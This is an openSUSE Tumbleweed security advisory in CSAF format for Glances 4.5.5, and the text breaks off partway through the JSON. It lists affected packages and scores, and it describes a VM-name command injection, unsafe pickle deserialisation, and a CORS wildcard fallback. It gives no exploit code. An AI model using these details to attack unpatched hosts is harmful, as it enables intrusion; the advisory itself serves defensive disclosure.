Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64	—	Vendor Fix

Threats

Impact important

CVE-2026-46611

5.3 (Medium)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

Affected products

Recommended 16 products

Product	Version	Remediation
Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64	—	Vendor Fix

Threats

Impact moderate

CVE-2026-53925

Affected products

Recommended 16 products

Product	Version	Remediation
Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64	—	Vendor Fix

Threats

Impact important

References

17 references

URL	Category
https://www.suse.com/support/security/rating/	external
https://ftp.suse.com/pub/projects/security/csaf/o…	self
https://www.suse.com/security/cve/CVE-2026-46606/	self
https://www.suse.com/security/cve/CVE-2026-46607/	self
https://www.suse.com/security/cve/CVE-2026-46608/	self
https://www.suse.com/security/cve/CVE-2026-46611/	self
https://www.suse.com/security/cve/CVE-2026-53925/	self
https://www.suse.com/security/cve/CVE-2026-46606	external
https://bugzilla.suse.com/1268800	external
https://www.suse.com/security/cve/CVE-2026-46607	external
https://bugzilla.suse.com/1268854	external
https://www.suse.com/security/cve/CVE-2026-46608	external
https://bugzilla.suse.com/1268855	external
https://www.suse.com/security/cve/CVE-2026-46611	external
https://bugzilla.suse.com/1268856	external
https://www.suse.com/security/cve/CVE-2026-53925	external
https://bugzilla.suse.com/1268984	external

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "glances-common-4.5.5-1.1 on GA media",
        "title": "Title of the patch"
      },
      {
        "category": "description",
        "text": "These are all security issues fixed in the glances-common-4.5.5-1.1 package on the GA media of openSUSE Tumbleweed.",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "openSUSE-Tumbleweed-2026-11122",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_11122-1.json"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2026-46606 page",
        "url": "https://www.suse.com/security/cve/CVE-2026-46606/"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2026-46607 page",
        "url": "https://www.suse.com/security/cve/CVE-2026-46607/"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2026-46608 page",
        "url": "https://www.suse.com/security/cve/CVE-2026-46608/"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2026-46611 page",
        "url": "https://www.suse.com/security/cve/CVE-2026-46611/"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2026-53925 page",
        "url": "https://www.suse.com/security/cve/CVE-2026-53925/"
      }
    ],
    "title": "glances-common-4.5.5-1.1 on GA media",
    "tracking": {
      "current_release_date": "2026-06-25T00:00:00Z",
      "generator": {
        "date": "2026-06-25T00:00:00Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "openSUSE-SU-2026:11122-1",
      "initial_release_date": "2026-06-25T00:00:00Z",
      "revision_history": [
        {
          "date": "2026-06-25T00:00:00Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "glances-common-4.5.5-1.1.aarch64",
                "product": {
                  "name": "glances-common-4.5.5-1.1.aarch64",
                  "product_id": "glances-common-4.5.5-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python311-Glances-4.5.5-1.1.aarch64",
                "product": {
                  "name": "python311-Glances-4.5.5-1.1.aarch64",
                  "product_id": "python311-Glances-4.5.5-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python313-Glances-4.5.5-1.1.aarch64",
                "product": {
                  "name": "python313-Glances-4.5.5-1.1.aarch64",
                  "product_id": "python313-Glances-4.5.5-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python314-Glances-4.5.5-1.1.aarch64",
                "product": {
                  "name": "python314-Glances-4.5.5-1.1.aarch64",
                  "product_id": "python314-Glances-4.5.5-1.1.aarch64"
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "glances-common-4.5.5-1.1.ppc64le",
                "product": {
                  "name": "glances-common-4.5.5-1.1.ppc64le",
                  "product_id": "glances-common-4.5.5-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python311-Glances-4.5.5-1.1.ppc64le",
                "product": {
                  "name": "python311-Glances-4.5.5-1.1.ppc64le",
                  "product_id": "python311-Glances-4.5.5-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python313-Glances-4.5.5-1.1.ppc64le",
                "product": {
                  "name": "python313-Glances-4.5.5-1.1.ppc64le",
                  "product_id": "python313-Glances-4.5.5-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python314-Glances-4.5.5-1.1.ppc64le",
                "product": {
                  "name": "python314-Glances-4.5.5-1.1.ppc64le",
                  "product_id": "python314-Glances-4.5.5-1.1.ppc64le"
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "glances-common-4.5.5-1.1.s390x",
                "product": {
                  "name": "glances-common-4.5.5-1.1.s390x",
                  "product_id": "glances-common-4.5.5-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python311-Glances-4.5.5-1.1.s390x",
                "product": {
                  "name": "python311-Glances-4.5.5-1.1.s390x",
                  "product_id": "python311-Glances-4.5.5-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python313-Glances-4.5.5-1.1.s390x",
                "product": {
                  "name": "python313-Glances-4.5.5-1.1.s390x",
                  "product_id": "python313-Glances-4.5.5-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python314-Glances-4.5.5-1.1.s390x",
                "product": {
                  "name": "python314-Glances-4.5.5-1.1.s390x",
                  "product_id": "python314-Glances-4.5.5-1.1.s390x"
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "glances-common-4.5.5-1.1.x86_64",
                "product": {
                  "name": "glances-common-4.5.5-1.1.x86_64",
                  "product_id": "glances-common-4.5.5-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python311-Glances-4.5.5-1.1.x86_64",
                "product": {
                  "name": "python311-Glances-4.5.5-1.1.x86_64",
                  "product_id": "python311-Glances-4.5.5-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python313-Glances-4.5.5-1.1.x86_64",
                "product": {
                  "name": "python313-Glances-4.5.5-1.1.x86_64",
                  "product_id": "python313-Glances-4.5.5-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python314-Glances-4.5.5-1.1.x86_64",
                "product": {
                  "name": "python314-Glances-4.5.5-1.1.x86_64",
                  "product_id": "python314-Glances-4.5.5-1.1.x86_64"
                }
              }
            ],
            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "openSUSE Tumbleweed",
                "product": {
                  "name": "openSUSE Tumbleweed",
                  "product_id": "openSUSE Tumbleweed",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:opensuse:tumbleweed"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "glances-common-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64"
        },
        "product_reference": "glances-common-4.5.5-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "glances-common-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le"
        },
        "product_reference": "glances-common-4.5.5-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "glances-common-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x"
        },
        "product_reference": "glances-common-4.5.5-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "glances-common-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64"
        },
        "product_reference": "glances-common-4.5.5-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64"
        },
        "product_reference": "python311-Glances-4.5.5-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le"
        },
        "product_reference": "python311-Glances-4.5.5-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x"
        },
        "product_reference": "python311-Glances-4.5.5-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64"
        },
        "product_reference": "python311-Glances-4.5.5-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64"
        },
        "product_reference": "python313-Glances-4.5.5-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le"
        },
        "product_reference": "python313-Glances-4.5.5-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x"
        },
        "product_reference": "python313-Glances-4.5.5-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64"
        },
        "product_reference": "python313-Glances-4.5.5-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python314-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64"
        },
        "product_reference": "python314-Glances-4.5.5-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python314-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le"
        },
        "product_reference": "python314-Glances-4.5.5-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python314-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x"
        },
        "product_reference": "python314-Glances-4.5.5-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python314-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
        },
        "product_reference": "python314-Glances-4.5.5-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2026-46606",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2026-46606"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances KVM/QEMU monitoring engine (glances/plugins/vms/engines/virsh.py) passes VM domain names, read directly from virsh list --all output, into f-string command templates that are processed by secure_popen(). secure_popen() is explicitly designed to interpret \u0026\u0026, |, and \u003e as shell operators. Because domain names are never sanitised before interpolation, any user with the ability to create or rename a KVM/QEMU virtual machine can execute arbitrary commands as the OS user running Glances - commonly root on hypervisor hosts. This vulnerability is fixed in 4.5.5.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
          "openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
          "openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
          "openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
          "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
          "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
          "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
          "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
          "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
          "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
          "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
          "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
          "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
          "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
          "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
          "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2026-46606",
          "url": "https://www.suse.com/security/cve/CVE-2026-46606"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1268800 for CVE-2026-46606",
          "url": "https://bugzilla.suse.com/1268800"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2026-06-25T00:00:00Z",
          "details": "important"
        }
      ],
      "title": "CVE-2026-46606"
    },
    {
      "cve": "CVE-2026-46607",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2026-46607"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, glances/outdated.py uses pickle.load() to read a version-check cache file stored at a predictable, world-accessible path (~/.cache/glances/glances-version.db or $XDG_CACHE_HOME/glances/glances-version.db). No integrity check, signature verification, or format validation is performed before deserialization. An attacker with write access to that path - through any of several realistic local or container-level scenarios - can plant a malicious pickle file and achieve arbitrary code execution as the OS user running Glances the next time it starts with version checking enabled (the default). This vulnerability is fixed in 4.5.5.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
          "openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
          "openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
          "openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
          "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
          "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
          "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
          "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
          "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
          "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
          "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
          "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
          "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
          "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
          "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
          "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2026-46607",
          "url": "https://www.suse.com/security/cve/CVE-2026-46607"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1268854 for CVE-2026-46607",
          "url": "https://bugzilla.suse.com/1268854"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2026-06-25T00:00:00Z",
          "details": "important"
        }
      ],
      "title": "CVE-2026-46607"
    },
    {
      "cve": "CVE-2026-46608",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2026-46608"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s) introduced a configurable CORS origin list in version 4.5.3 as a mitigation for CVE-2026-33533. However, the implementation silently falls back to Access-Control-Allow-Origin: * whenever cors_origins contains more than one entry. An operator who configures an explicit two-entry allowlist (e.g. two internal dashboard origins) intending to restrict browser access instead receives the unrestricted wildcard. A malicious web page served from any origin can issue a CORS simple request to /RPC2 and read the full system monitoring dataset without the victim\u0027s knowledge. This vulnerability is fixed in 4.5.5.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
          "openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
          "openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
          "openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
          "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
          "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
          "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
          "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
          "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
          "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
          "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
